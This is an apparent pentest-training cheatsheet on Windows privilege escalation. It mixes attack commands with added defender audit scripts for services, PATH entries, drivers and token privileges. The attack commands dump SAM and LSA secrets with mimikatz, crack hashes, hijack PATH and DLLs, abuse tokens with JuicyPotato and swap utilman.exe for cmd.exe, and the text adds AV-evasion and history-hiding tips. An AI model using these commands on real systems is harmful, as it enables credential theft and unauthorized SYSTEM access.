Complete Windows privilege-escalation reference: enumeration, password looting (SAM, HiveNightmare, LAPS, unattend.xml, SessionGopher), service misconfigs (DLL hijack, unquoted paths, $PATH interception, weak DACLs), kernel CVEs, AlwaysInstallElevated, vulnerable drivers, PrintNightmare, LOLBAS, and the full Se* privilege-abuse matrix (Potato family).
0. Overview & methodology
Windows — Privilege Escalation
This is a complete operator reference for local privilege escalation on Windows — from "low-priv user shell" to NT AUTHORITY\SYSTEM. It covers everything that a CRTP / OSCP / OSEP / CRTO / HTB Pro Lab candidate is expected to know, organised into the order you will normally execute it on a real engagement: enumerate → loot → abuse misconfig → exploit kernel/driver → impersonate.
Every command below is the literal command you will type at the target shell or on Kali. We deliberately keep the cheatsheet style of the source: commands first, prose only where it adds context. When you copy-paste, treat angle-bracket placeholders as values you need to substitute.
Suggested mental model

| Phase | What you are actually doing |
|---|---|
| 1. Recon | Who am I? What groups? What OS? What network? Domain joined? |
| 2. Loot | Saved creds, history files, config files, registry, LSASS where allowed |
| 3–4. Abuse misconfig / exploit kernel or driver | SeImpersonate via Potato; vulnerable signed drivers (BYOVD); kernel CVE |
| 5. Impersonation | Token privileges → full SYSTEM (SeImpersonate, SeBackup, SeRestore, SeDebug) |
| 6. Persistence | Out of scope here — covered in the AD attack notes |
☼ Pro tip — Always start with one of the automated tools (winPEAS / PowerUp / Seatbelt / PrivescCheck). Then read the output by hand — tooling misses subtle wins like password hints in Description fields, custom services, or weird ACLs on a single registry key.
1. Tools
You should know at least one tool from each category. winPEAS + PrivescCheck are the modern duo; PowerUp + Sherlock/Watson are still extremely common on older boxes.
Watson is a .NET 2.0/4.0 compliant C# implementation that audits installed KBs and maps to known kernel/elevation CVEs. Sherlock (PowerShell) is deprecated but still useful on Win7 boxes.
Standalone executable to scan for simple Windows privilege-escalation vectors — ACL audits, service misconfigs, registry keys. Output is verbose but exhaustive.
The de-facto modern enumeration tool. Coloured output, finds 90% of misconfigurations automatically. Available as winPEAS.exe, winPEAS.bat, winPEASany.exe.
cmd
```
# .bat (no AV detections, ASCII output)
.\winPEAS.bat
# .exe (richer)
.\winPEASany.exe
```
WES-NG (Windows Exploit Suggester — Next Generation)
bash
```
# First obtain systeminfo on the target
systeminfo
systeminfo > systeminfo.txt
# Then feed it to WES-NG on Kali
python3 wes.py --update-wes
python3 wes.py --update
python3 wes.py systeminfo.txt
```
☼ Pro tip — Rule of thumb on a real engagement: drop winPEAS first for a fast read, then PrivescCheck for the deeper audit, then Seatbelt if you want extra coverage on certs/AMSI/AppLocker. The three tools overlap deliberately — if all three flag something, it’s reliable.
OS architecture
cmd
```
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE%
```
Environment variables
cmd / ps
```
set
Get-ChildItem Env: | ft Key,Value
```
Logical drives
cmd / ps
```
wmic logicaldisk get caption || fsutil fsinfo drives
wmic logicaldisk get caption,description,providername
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"} | ft Name,Root
```
ⓘ Note — The systeminfo + wmic qfe output is what WES-NG and Watson consume to map missing patches to public CVEs. Save them early — they are also the easiest way to identify the Windows build for kernel-exploit selection.
Local users
cmd / ps
```
net user
whoami /all
Get-LocalUser | ft Name,Enabled,LastLogon
Get-ChildItem C:\Users -Force | select Name
```
Logon policy (brute-force feasibility)
cmd
```
net accounts
```
Details about a specific user
cmd
```
net user administrator
net user admin
net user %USERNAME%
```
Local groups & their members
cmd / ps
```
net localgroup
Get-LocalGroup | ft Name
net localgroup administrators
Get-LocalGroupMember Administrators | ft Name, PrincipalSource
# French-localised hosts name the group differently
Get-LocalGroupMember Administrateurs | ft Name, PrincipalSource
```
☼ Pro tip — Look at whoami /priv before running anything else — a single SeImpersonatePrivilege = Enabled often makes the rest of the cheatsheet irrelevant (jump straight to Section 23 Potato).
AV / EDR
Identify AV / EDR before staging payloads — Windows Defender will flat-out kill winPEAS.exe, mimikatz.exe, and most Potato binaries unless you obfuscate.
☼ Pro tip — Other quick AV/EDR detectors: tasklist /svc | findstr -i defender, sc query windefend, look for processes from CrowdStrike, SentinelOne, cylance, cb* (Carbon Black), MsMpEng.exe.
6. Default writeable folders
These folders are writeable by regular users on a default Windows installation. They are your dropzone for payloads, the search target for DLL-hijack candidates, and useful staging for the $PATH interception attack (Section 12).
7. Password looting
Password looting is the highest ROI activity in any Windows engagement. Spend the bulk of your time here.
SAM & SYSTEM hives
The Security Account Manager (SAM) database stores local-account NTLM hashes; it is mounted at HKLM\SAM and encrypted with a boot key derived from the SYSTEM hive. Both files live in %SYSTEMROOT%\System32\config\; older Windows also keeps backups in %SYSTEMROOT%\repair\.
cmd / kali
```
# Locations
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system
# Dump hashes (needs administrative rights, or HiveNightmare below)
pwdump SYSTEM SAM > /root/sam.txt
samdump2 SYSTEM SAM -o sam.txt
# Crack or pass-the-hash
john --format=NT /root/sam.txt
hashcat -m 1000 sam.txt rockyou.txt
```
HiveNightmare
Microsoft mistakenly left the SAM / SECURITY / SYSTEM hive files readable by BUILTIN\Users. The live files are locked, but any low-privilege user can read them from a Volume Shadow Copy snapshot and then dump the hashes locally.
cmd
```
# Confirm the vulnerability: BUILTIN\Users should not have read access on the hive
C:\Windows\System32> icacls config\SAM
config\SAM BUILTIN\Administrators:(I)(F)
           NT AUTHORITY\SYSTEM:(I)(F)
           BUILTIN\Users:(I)(RX)
# In mimikatz: check the current token, then list the shadow copies available
mimikatz> token::whoami /full
mimikatz> misc::shadowcopies
# Extract local SAM hashes via the VSS snapshot
mimikatz> lsadump::sam /system:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM /sam:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM
# Extract LSA secrets
mimikatz> lsadump::secrets /system:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM /security:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY
```
LAPS settings
Local Administrator Password Solution (LAPS) stores randomised local admin passwords in HKLM\Software\Policies\Microsoft Services\AdmPwd. If you can read the LAPS attributes you may already have the local admin password.
PowerShell history
ps
```
# Disable it for your own session (OPSEC)
Set-PSReadlineOption -HistorySaveStyle SaveNothing
# Read it on the target
type %USERPROFILE%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
cat (Get-PSReadlineOption).HistorySavePath
cat (Get-PSReadlineOption).HistorySavePath | sls passw
```
☼ Pro tip — After every action that lands you a new shell, immediately re-run findstr /si password ..., cmdkey /list, and check ConsoleHost_history.txt for the previous user. That single habit lands more privesc than any tool.
8. EoP — Processes & tasks
Running processes
cmd / ps
```
tasklist /v
net start
sc query
Get-Service
Get-Process
Get-WmiObject -Query "Select * from Win32_Process" | where { $_.Name -notlike "svchost*" } | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize
```
Installed software
ps
```
Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime
Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name
```
Services list
cmd
```
net start
wmic service list brief
tasklist /SVC
```
Scheduled tasks
cmd / ps
```
schtasks /query /fo LIST 2>nul | findstr TaskName
# Dump the verbose listing, then filter (the grep half is meant for Kali after transferring the file)
schtasks /query /fo LIST /v > schtask.txt; cat schtask.txt | grep "SYSTEM\|Task To Run"
Get-ScheduledTask | where { $_.TaskPath -notlike "\Microsoft*" } | ft TaskName,TaskPath,State
```
Startup items
cmd
```
wmic startup get caption,command
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"
```
ⓘ Note — A scheduled task that runs as SYSTEM and references a writable script path is a direct privesc — modify the script and wait for the schedule.
9. EoP — Incorrect service permissions
A service running as Administrator/SYSTEM with incorrect file or registry permissions might allow EoP. The pattern is always: replace the binary (or DLL it loads, or service config), restart the service, get SYSTEM.
Common patterns to look for:
- Orphaned installs — uninstalled software whose service still references a now-writable directory
- DLL Hijacking — the service loads a DLL that doesn’t exist on disk, but a writable folder is searched first
- Weak PATH directories — BUILTIN\Users:(F/M/W) on a folder containing service binaries
Find missing DLLs & build a malicious one
kali
```
# Find missing DLLs
#   - Find-PathDLLHijack (PowerUp.ps1)
#   - Process Monitor: filter for "NAME NOT FOUND" on DLL loads
# Compile a malicious DLL
# x64:
x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll
# x86:
i686-w64-mingw32-gcc windows_dll.c -shared -o output.dll
```
Check the permissions on the service binary
cmd
```
icacls "C:\Program Files\Vuln Service\service.exe"
# We are looking for these on the file or its directory:
#   BUILTIN\Users:(F) - Full access
#   BUILTIN\Users:(M) - Modify access
#   BUILTIN\Users:(W) - Write-only access
```
Example — Windows 10 CVE-2019-1322 UsoSvc
Service runs as LocalSystem; if you sit in the NT SERVICE\ service-account context (e.g. nt service\mssqlserver) you can rewrite the binPath and restart the service.
10. EoP — Windows Subsystem for Linux (WSL)
WSL (Windows Subsystem for Linux) lets a non-admin Windows user run a Linux distro. With root inside WSL you can bind to any port without elevation — useful when Defender is blocking native Windows shells. The default user is set per-distro; --default-user root changes it without a password.
Binary bash.exe can also be found in: C:\Windows\WinSxS\amd64_microsoft-windows-lxssbash_[...]\bash.exe.
Alternatively explore the WSL filesystem in C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\.
11. EoP — Unquoted service paths
The classic. If a service’s BINARY_PATH_NAME contains a space and is not quoted (e.g. C:\Program Files\Vuln Service\bin.exe), Windows will tokenise on whitespace and try in order: C:\Program.exe, then C:\Program Files\Vuln.exe, etc. Drop a binary at one of those positions in a folder you can write to and restart the service.
12. EoP — $PATH interception
Requirements:
- %PATH% contains a writeable folder with low privileges.
- The writeable folder is before the folder that contains the legitimate binary.
cmd / ps
```
# List contents of the PATH environment variable
# EXAMPLE OUTPUT: C:\Program Files\nodejs\;C:\WINDOWS\system32
$env:Path
# See permissions of the target folder
# EXAMPLE OUTPUT: BUILTIN\Users: GR,GW
icacls.exe "C:\Program Files\nodejs\"
# Place our evil-file in that folder.
copy evil-file.exe "C:\Program Files\nodejs\cmd.exe"
```
Because C:\Program Files\nodejs is before C:\WINDOWS\system32 on the PATH variable, the next time the user runs cmd.exe, our evil version in the nodejs folder will run instead of the legitimate one in the system32 folder.
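As an added defender-side audit (example code, not from the original cheatsheet), the following PowerShell script checks the three conditions Sections 9, 11 and 12 describe: service binaries or their directories writable by low-privilege principals, unquoted service paths together with the interception directories Windows would try, and writable directories on the machine PATH. It assumes Windows PowerShell 5.1 or later and English principal names; all function names are the example's own.

```powershell
# Added audit script, not from the original cheatsheet; assumes Windows PowerShell 5.1+, English
# principal names. Run it as an ordinary user: it reports what such a user could overwrite.
$LowPrivPrincipals = 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'Everyone'
$FSR = [System.Security.AccessControl.FileSystemRights]
# Rights that let a principal replace an entry (AppendData alone only creates subfolders);
# GENERIC_WRITE (0x40000000) and GENERIC_ALL (0x10000000) masks are checked separately.
$WriteBits = [int]($FSR::WriteData -bor $FSR::Delete -bor $FSR::ChangePermissions -bor $FSR::TakeOwnership)
$GenericMask = 0x40000000 -bor 0x10000000

function Test-LowPrivWritable {
    param([string]$Path)
    if (-not $Path -or -not (Test-Path -LiteralPath $Path)) { return $false }
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $false }
    foreach ($ace in $acl.Access) {
        # Only Allow ACEs that apply to this object itself; deny ACEs are not modelled
        if ($ace.AccessControlType -ne 'Allow' -or ($ace.PropagationFlags -band [System.Security.AccessControl.PropagationFlags]::InheritOnly)) { continue }
        if ($LowPrivPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        $mask = [int]$ace.FileSystemRights
        if ((($mask -band $WriteBits) -ne 0) -or (($mask -band $GenericMask) -ne 0)) { return $true }
    }
    return $false
}

# Executable part of a service command line, with the arguments stripped.
function Get-ServiceBinaryPath {
    param([string]$PathName)
    if ($PathName -match '^\s*"([^"]+)"') { return $Matches[1] }
    if ($PathName -match '^\s*(.+?\.exe)') { return $Matches[1] }   # -match is case-insensitive
    return ($PathName.Trim() -split ' ')[0]
}

# Section 9: service binaries, or their directory, that a low-privilege user can replace.
function Get-WritableServiceBinary {
    foreach ($svc in (Get-CimInstance Win32_Service | Where-Object PathName)) {
        $exe = Get-ServiceBinaryPath $svc.PathName
        if (-not $exe) { continue }
        $fileW = Test-LowPrivWritable $exe; $dirW = Test-LowPrivWritable (Split-Path -Parent $exe)
        if ($fileW -or $dirW) {
            [pscustomobject]@{ Service = $svc.Name; RunsAs = $svc.StartName; Path = $exe; FileWritable = $fileW; DirWritable = $dirW }
        }
    }
}

# Section 11: unquoted paths containing spaces, plus the directories Windows would try first.
function Get-UnquotedServiceFinding {
    foreach ($svc in (Get-CimInstance Win32_Service | Where-Object PathName)) {
        if ($svc.PathName -match '^\s*"' -or $svc.PathName -match '^[A-Z]:\\Windows\\') { continue }
        $exe = Get-ServiceBinaryPath $svc.PathName
        if ($exe -notmatch ' ') { continue }
        # C:\Program Files\Vuln Service\bin.exe -> C:\Program.exe, C:\Program Files\Vuln.exe
        $parts = $exe -split ' '
        $dirs = for ($i = 1; $i -lt $parts.Count; $i++) { Split-Path -Parent (($parts[0..($i - 1)] -join ' ') + '.exe') }
        [pscustomobject]@{ Service = $svc.Name; RunsAs = $svc.StartName; Path = $exe
                           WritableInterceptDirs = @($dirs | Sort-Object -Unique | Where-Object { Test-LowPrivWritable $_ }) }
    }
}

# Section 12: writable directories on the machine PATH and their position (earlier entries win).
function Get-WritablePathEntry {
    $i = 0
    foreach ($dir in ([Environment]::GetEnvironmentVariable('Path', 'Machine') -split ';')) {
        $i++
        if (Test-LowPrivWritable $dir) { [pscustomobject]@{ Position = $i; Directory = $dir } }
    }
}

Get-WritableServiceBinary  | Format-Table -AutoSize
Get-UnquotedServiceFinding | Format-Table -AutoSize
Get-WritablePathEntry      | Format-Table -AutoSize
```

A clean host prints three empty tables; any row is something to fix (quote the path, tighten the DACL, or remove the PATH entry), and the same script run under the service's own account shows what that account could alter.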
13. EoP — Named pipes
- Find named pipes: `[System.IO.Directory]::GetFiles("\\.\pipe\")`
- Check the named-pipe DACL: `pipesec.exe`
- Reverse-engineer the consuming software
- Send data through the named pipe: `program.exe >\\.\pipe\StdOutPipe 2>\\.\pipe\StdErrPipe`
ⓘ Note — Named-pipe impersonation is the foundation of the entire Potato family (RottenPotato/JuicyPotato/RoguePotato/PrintSpoofer/EFSPotato — see Section 23).
14. EoP — Kernel exploitation
Use kernel exploitation as a last resort — it’s noisy, can BSOD the box, and AV will frequently flag the precompiled binaries. Always run WES-NG or Watson against the target’s systeminfo output before attempting.
AlwaysInstallElevated
When both HKLM and HKCU have AlwaysInstallElevated=1, any user can run an MSI as NT AUTHORITY\SYSTEM. This is a one-line privesc and is still surprisingly common on legacy estates.
MSI Custom Actions & repair
Custom Actions in MSI allow developers to specify scripts or executables to run at various points during installation. If a CustomAction is misconfigured (calls a script from a user-writable path, races with the user, or pops a conhost as SYSTEM), msiexec /fa ("repair") will re-execute them with SYSTEM privileges.
mandiant/msi-search — map installed products to their MSI files
cmd
```
wmic product get identifyingnumber,name,vendor,version
```
Trigger CustomActions via the /fa repair parameter. You can pass either the IdentifyingNumber GUID or the path to the installer (c:\windows\installer\XXXXXXX.msi). The repair runs as the NT SYSTEM account.
Typical CustomAction misconfigurations:
- Missing quiet parameter: spawns conhost.exe as SYSTEM. Use Ctrl+A to select text and pause; then conhost → properties → legacy console mode link → Internet Explorer → Ctrl+O → cmd.exe.
- GUI with direct actions: opens a URL, start the browser and pivot.
- Binaries/scripts loaded from user-writable paths: you might need to win a race condition.
- DLL hijacking / search-order abuse.
- PowerShell -NoProfile missing: add custom commands into your profile.
Insecure GUI applications running as SYSTEM
Any application running as SYSTEM that allows an unprivileged user to spawn a CMD, browse directories, or open arbitrary files = trivial SYSTEM shell. Look for kiosk applications, vendor-installed shortcut managers, accessibility panels, and Microsoft’s own Help & Support tooling.
Classic example: Windows Help and Support (Windows + F1), search for "command prompt", click on "Click to open Command Prompt".
17. EoP — Evaluating vulnerable drivers
Look for vulnerable kernel drivers loaded on the box — the BYOVD ("Bring Your Own Vulnerable Driver") technique abuses a signed-but-buggy driver that an attacker carries onto the host. Often we don’t spend enough time looking at this category.
Living Off The Land Drivers (LOLDrivers) — a curated list of Windows drivers used by adversaries to bypass security controls and carry out attacks.
Native binary DriverQuery.exe
powershell
```
PS C:\Users\Swissky> driverquery.exe /fo table /si
Module Name  Display Name           Driver Type  Link Date
===========  =====================  ===========  ====================
1394ohci     1394 OHCI Compliant Ho Kernel       12/10/2006 4:44:38 PM
3ware        3ware                  Kernel       5/18/2015 6:28:03 PM
ACPI         Microsoft ACPI Driver  Kernel       12/9/1975 6:17:08 AM
AcpiDev      ACPI Devices driver    Kernel       12/7/1993 6:22:19 AM
acpiex       Microsoft ACPIEx Drive Kernel       3/1/2087 8:53:50 AM
acpipagr     ACPI Processor Aggrega Kernel       1/24/2081 8:36:36 AM
AcpiPmi      ACPI Power Meter Drive Kernel       11/19/2006 9:20:15 PM
acpitime     ACPI Wake Alarm Driver Kernel       2/9/1974 7:10:30 AM
ADP80XX      ADP80XX                Kernel       4/9/2015 4:49:48 AM
```
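The driverquery listing above only gives names and link dates. As an added defender-side inventory (example code, not from the original cheatsheet or the LOLDrivers project), the following PowerShell script hashes every loaded kernel driver, records its Authenticode status, and flags any whose SHA256 appears in a hash list you supply; the hash-file path is a placeholder and the function names are the example's own.

```powershell
# Added example, not from the original cheatsheet. Assumes Windows PowerShell 5.1+ and a text file
# with one known-bad SHA256 per line (collected from the LOLDrivers entries); the path is a placeholder.
$KnownBadHashFile = 'C:\audit\loldrivers-sha256.txt'

# Win32_SystemDriver.PathName comes in several spellings; normalise it to a real file path.
function Resolve-DriverPath {
    param([string]$PathName)
    if (-not $PathName) { return $null }
    $p = $PathName -replace '^\\\?\?\\', ''                    # \??\C:\...      -> C:\...
    $p = $p -replace '^\\SystemRoot\\', "$env:SystemRoot\"    # \SystemRoot\... -> C:\Windows\...
    if ($p -notmatch '^[A-Za-z]:\\') { $p = Join-Path $env:SystemRoot $p }  # system32\drivers\x.sys
    return $p
}

# Hash and signature status of every loaded kernel driver.
function Get-LoadedDriverInventory {
    foreach ($drv in (Get-CimInstance Win32_SystemDriver | Where-Object { $_.State -eq 'Running' })) {
        $path = Resolve-DriverPath $drv.PathName
        $exists = [bool]$path -and (Test-Path -LiteralPath $path)
        $sig = if ($exists) { Get-AuthenticodeSignature -FilePath $path } else { $null }
        [pscustomobject]@{
            Name      = $drv.Name
            Path      = $path
            SHA256    = if ($exists) { (Get-FileHash -LiteralPath $path -Algorithm SHA256).Hash } else { $null }
            SigStatus = if ($sig) { $sig.Status.ToString() } else { 'FileNotFound' }
            Signer    = if ($sig -and $sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { $null }
        }
    }
}

# Flags loaded drivers whose hash appears in the supplied list.
function Find-KnownBadDriver {
    param([string]$HashFile = $KnownBadHashFile)
    $bad = @{}
    if (Test-Path -LiteralPath $HashFile) {
        foreach ($line in Get-Content -LiteralPath $HashFile) {
            $h = $line.Trim().ToUpperInvariant()
            if ($h -match '^[0-9A-F]{64}$') { $bad[$h] = $true }   # ignore comments and blank lines
        }
    }
    foreach ($d in Get-LoadedDriverInventory) {
        $d | Add-Member -NotePropertyName KnownBad -NotePropertyValue ([bool]$d.SHA256 -and $bad.ContainsKey($d.SHA256)) -PassThru
    }
}

Find-KnownBadDriver | Sort-Object KnownBad -Descending | Format-Table Name, KnownBad, SigStatus, Signer, Path -AutoSize
```

A driver with KnownBad = True, or a SigStatus other than Valid, is the BYOVD candidate the section warns about; a valid Microsoft signature alone proves nothing, since LOLDrivers entries are signed.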
Shadow copies
If you have local administrator access on a machine try to list shadow copies — it’s an easy way to read SAM/NTDS/locked files without dealing with the live registry/file handles.
cmd
```
# List shadow copies using vssadmin (needs Administrator access)
vssadmin list shadows
# List shadow copies using diskshadow
diskshadow list shadows all
# Make a symlink to the shadow copy and access it
mklink /d c:\shadowcopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\
```
21. EoP — Local administrator → NT SYSTEM
The simplest possible local-admin → SYSTEM bridge — PsExec with -i -s spawns an interactive process as the LocalSystem account.
☼ Pro tip — Other paths to SYSTEM from local-admin: nt-service-create & sc create with obj= LocalSystem; schedule a task at boot/now; at (legacy); RunAsTI for TrustedInstaller.
22. EoP — Living Off The Land Binaries & Scripts (LOLBAS)
The LOLBAS project (Living Off The Land Binaries, Scripts, and Libraries) documents every signed-by-Microsoft binary that can be misused for: bypassing AppLocker, downloading files, executing arbitrary code, dumping LSASS, etc.
A LOLBin/Lib/Script must:
- Be a Microsoft-signed file, either native to the OS or downloaded from Microsoft
- Have extra "unexpected" functionality. Intended use cases are not documented — exceptions are application-whitelisting bypasses
- Have functionality that would be useful to an APT or red team
23. EoP — Token privileges & the Potato family
Token privileges are the most lucrative quick-wins on modern Windows. Always run whoami /priv first — one of these enabled is often the entire engagement.
Quick reference matrix

| Privilege | Impact | Tool | Execution path | Remarks |
|---|---|---|---|---|
| SeAssignPrimaryToken | Admin | 3rd-party tool | Impersonate tokens with potato.exe / rottenpotato.exe / juicypotato.exe | Same vector as SeImpersonate |
| SeImpersonate | Admin | Potato family | Spin up a fake COM/RPC server, force SYSTEM to authenticate, impersonate its token | JuicyPotato (legacy), PrintSpoofer / EFSPotato / RoguePotato / GodPotato on modern Windows |
| SeBackup | Threat | Built-in | Read sensitive files with robocopy /b; copy SAM/SYSTEM/NTDS | Combine with SeRestore. Read MEMORY.DMP if available. |
| SeCreateToken | Admin | 3rd-party tool | Create arbitrary token including local-admin rights with NtCreateToken | — |
| SeDebug | Admin | PowerShell | Duplicate the lsass.exe token; inject into any process | Script: FuzzySecurity |
| SeLoadDriver | Admin | 3rd-party tool | Load a buggy kernel driver such as szkg64.sys or capcom.sys and exploit it | CVE-2018-15732 (szkg64). Alternatively unload security drivers with fltMC sysmondrv |
| SeRestore | Admin | PowerShell | Enable privilege (Enable-SeRestorePrivilege); rename utilman.exe to utilman.old; copy cmd.exe over utilman.exe; lock console; press Win+U → SYSTEM cmd | May be detected by some AV. Alt: replace service binaries under Program Files using the same privilege. |
| | | | Manipulate tokens to have local-admin rights included | Often requires combination with other privileges |
| SeManageVolume | Admin | 3rd-party tool | Combined with SeBackup/SeRestore lets you mount any volume and rewrite system files | See SeManageVolumeExploit (CsEnox) |
| SeShutdown | Threat | Built-in | Trigger shutdown/restart; can be chained with scheduled tasks for persistence | Not direct EoP |
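To turn the matrix into a repeatable check on service accounts, here is an added PowerShell example (not from the original cheatsheet) that parses `whoami /priv` output and reports every privilege from the table above with its Impact column. It assumes English `whoami` output; the function names and the sample listing are the example's own.

```powershell
# Added example, not from the original cheatsheet. Assumes English `whoami /priv` output (privilege
# names are always English, but the State column is localised on non-English Windows).
$PrivilegeMatrix = @{           # impact column of the matrix above
    SeAssignPrimaryTokenPrivilege = 'Admin'
    SeImpersonatePrivilege        = 'Admin'
    SeBackupPrivilege             = 'Threat'
    SeCreateTokenPrivilege        = 'Admin'
    SeDebugPrivilege              = 'Admin'
    SeLoadDriverPrivilege         = 'Admin'
    SeRestorePrivilege            = 'Admin'
    SeManageVolumePrivilege       = 'Admin'
    SeShutdownPrivilege           = 'Threat'
}

# Parses the table printed by `whoami /priv`: header lines, a ===== ruler, then one row per privilege.
function ConvertFrom-WhoamiPriv {
    param([string[]]$Lines)
    $inTable = $false
    foreach ($line in $Lines) {
        if (-not $inTable) { if ($line -match '^=+\s+=+') { $inTable = $true }; continue }
        if ($line -match '^(?<name>Se\w+Privilege)\s+(?<desc>.+?)\s+(?<state>Enabled|Disabled)\s*$') {
            [pscustomobject]@{ Name = $Matches['name']; Description = $Matches['desc']; State = $Matches['state'] }
        }
    }
}

# Joins the parsed privileges with the matrix. A "Disabled" privilege is still held by the token:
# the process can enable it itself, so it is reported rather than ignored.
function Get-PrivilegeRisk {
    param([string[]]$Lines = (whoami /priv))
    foreach ($p in ConvertFrom-WhoamiPriv $Lines) {
        if ($PrivilegeMatrix.ContainsKey($p.Name)) {
            [pscustomobject]@{ Privilege = $p.Name; State = $p.State; Impact = $PrivilegeMatrix[$p.Name] }
        }
    }
}

# Constructed sample in whoami /priv format, as a typical IIS/MSSQL service account prints it.
$Sample = @'
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
'@

Get-PrivilegeRisk -Lines ($Sample -split "`r?`n") | Format-Table -AutoSize   # the sample
Get-PrivilegeRisk | Format-Table -AutoSize                                   # the current token
```

On the sample the report lists SeAssignPrimaryTokenPrivilege (Disabled, Admin) and SeImpersonatePrivilege (Enabled, Admin), which is exactly the combination the Potato family needs; run it under each service identity to find accounts that should be moved to a virtual service account or stripped of the privilege.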
Restore a service account’s privileges
When a service account loses SeImpersonatePrivilege (e.g. by changing service identity), you can sometimes re-grant it through Group Policy or directly via secedit. Full cheatsheet: github.com/gtworek/Priv2Admin and PrivescCheck.
Meterpreter getsystem and alternatives
msf
```
meterpreter > getsystem
# getsystem tries, in order:
#   1. Named pipe impersonation (in memory / admin)
#   2. Named pipe impersonation (dropper / admin)
#   3. Token duplication (in memory / admin)
#   4. Named pipe impersonation (RPCSS variant)
#   5. Named pipe impersonation (PrintSpooler variant)
#   6. Named pipe impersonation (EFSRPC variant - EfsPotato)
```
RottenPotato — classic token impersonation
cmd
```
# Drop on target with SeImpersonatePrivilege
.\RottenPotato.exe
```
JuicyPotato — abuse of golden COM CLSIDs
cmd
```
JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -t * -c {CLSID}
# See: https://ohpe.it/juicy-potato/CLSID/ for working CLSIDs per OS
```
⚠ Caution — JuicyPotato is patched on Windows 10 build 1809 and Server 2019+. Use PrintSpoofer, RoguePotato, GodPotato, EFSPotato on modern boxes.
Privileged File Write (one-shot SYSTEM via writeable file mapping)
A class of attacks that abuses Windows components which run as SYSTEM and load DLLs from predictable paths — if your low-priv user can write to one of those paths, you write a malicious DLL and trigger the load:

| Technique | Idea |
|---|---|
| DiagHub | diagtrack service loads DLLs from C:\Windows\System32; combine with arbitrary file write |
| UsoDLLLoader | Update Orchestrator Service (UsoSvc) loads from a predictable path |
| WerTrigger | Windows Error Reporting service loads wer*.dll |
| WerMgr | Similar — WER manager loads vulnerable DLL chain on crash dispatch |
24. Methodology recap & defender checklist
Recommended order of operations on a real engagement

| # | Action |
|---|---|
| 1 | whoami /priv & whoami /groups — do I already have a winning privilege? |
| 2 | systeminfo, wmic qfe — capture OS + patches for kernel-CVE selection |
| 3 | Run winPEAS — let it find the easy wins |
| 4 | Read it by hand — tooling will miss subtle ACL/description-field wins |
| 5 | cmdkey /list, history files, registry password dump |
| 6 | Service permission audit (accesschk -uwcqv "Authenticated Users") |
| 7 | Look for AlwaysInstallElevated (one query, free SYSTEM) |